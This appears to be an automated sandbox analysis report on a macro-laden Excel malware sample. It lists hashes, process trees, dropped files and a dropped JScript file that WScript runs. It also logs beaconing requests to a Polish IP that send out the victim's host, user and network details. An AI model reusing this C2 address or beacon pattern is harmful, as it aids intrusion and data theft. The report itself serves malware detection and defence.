analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

00369370.xls

Full analysis: https://app.any.run/tasks/77f93982-6924-40b3-a934-f78a95e2597a
Verdict: Malicious activity
Analysis date: October 19, 2020, 21:51:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Subject: M % fx9SFNFzx0Z, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Oct 19 11:38:48 2020, Security: 0
MD5:

0801310447AC6FF3DB5E3447DFB7EA51

SHA1:

021636550DC9FC56B349C4725CFA016B21EBE3DD

SHA256:

706BCE767F11302A38F1D5EA4FF46C77889925644990970CA1CEE736032B1437

SSDEEP:

12288:H1AI+sRKvwdFWakZGQppX0t4gT7CSPkoAhxLlekoA9lbXrz6tQkoAfNRplkoAIz/:Hh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes scripts

      • EXCEL.EXE (PID: 1336)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1336)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads settings of System Certificates

      • WScript.exe (PID: 1772)
    • Manual execution by user

      • WScript.exe (PID: 3356)
      • notepad++.exe (PID: 3720)
      • explorer.exe (PID: 492)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 1336)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 2
TitleOfParts:
  • Sheet1
  • Sheet2
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
Company: -
Manager: -
Category: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2020:10:19 10:38:48
CreateDate: 2015:06:05 18:17:20
Software: Microsoft Excel
LastModifiedBy: -
Author: -
Subject: M % fx9SFNFzx0Z
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs wscript.exe explorer.exe no specs notepad++.exe gup.exe wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
1336"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1772"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" C:\Windows\System32\WScript.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
492"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3720"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\Public\Documents\icon.txtense.jse"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Version:
7.51
4044"C:\Program Files\Notepad++\updater\gup.exe" -v7.51C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
4294967295
Version:
4.1
3356"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\icon.txtense.jse" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
1 151
Read events
985
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
4
Unknown types
3

Dropped files

PID
Process
Filename
Type
1336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR43E4.tmp.cvr
MD5:
SHA256:
1336EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\00369370.xls.LNKlnk
MD5:D844307CE3391E7361899A698E9F970E
SHA256:A1C636B4F78BEE0B2E516FD07C3871F5340339D82C1A532CAB14697C5FA225E7
1336EXCEL.EXEC:\Users\Public\Documents\icon.txtense.jsetext
MD5:AD62B4429562C14D90E217A46F743BAC
SHA256:017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13
1336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exdtlb
MD5:D3C12DD09DD47640A34BD32E646D6772
SHA256:3572936692EA660FAC40DEE2B3B0BC5B6F2B2ED1796780DED9D4B318BFCB8003
1336EXCEL.EXEC:\Users\Public\Documents\icon.txttext
MD5:AD62B4429562C14D90E217A46F743BAC
SHA256:017DCD5B7421FE6FB71B140F3DFD0051846416D87EA26E7C34A2C6D7E7A9EC13
1336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DA85C2B.emfemf
MD5:A7AB69B742BAEEA6365B31084A55EC0C
SHA256:9D86FA02D0E06F4956AFA0EE43A513E9DED87FE1AEB5E7A94CC3881A3311B3D4
1336EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:3E7D7AB0A97664A36C02CEBC0690E921
SHA256:1631F8B21FE820387BDF5D7522CC96DE97BDCF8FA44363B7DCAFC43B400F90E5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&25010062
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&120017734
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1497019835
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&674521590
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&137075153
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&1470815840
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&8827365
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&123989687
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&16582858
PL
suspicious
1772
WScript.exe
GET
200
188.116.36.154:443
https://188.116.36.154/vw5aKm/j1vXTu.php?Rd=OK&Rf=3cc714f0&Rk=USER-PC@@USER-PC@@admin@@*192.168.100.3%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Network%20Connection@@Standalone%20Workstation@@@@no%20LDAP%3B%3ASUM%3A0%3A&908815358
PL
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3356
WScript.exe
188.116.36.154:443
NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly
PL
suspicious
1772
WScript.exe
188.116.36.154:443
NEPHAX Spolka jawna Arkadiusz Kawalec Michal Podsiadly
PL
suspicious
4044
gup.exe
104.31.89.28:443
notepad-plus-plus.org
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
notepad-plus-plus.org
  • 104.31.89.28
  • 172.67.218.84
  • 104.31.88.28
whitelisted

Threats

No threats detected
Process
Message
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093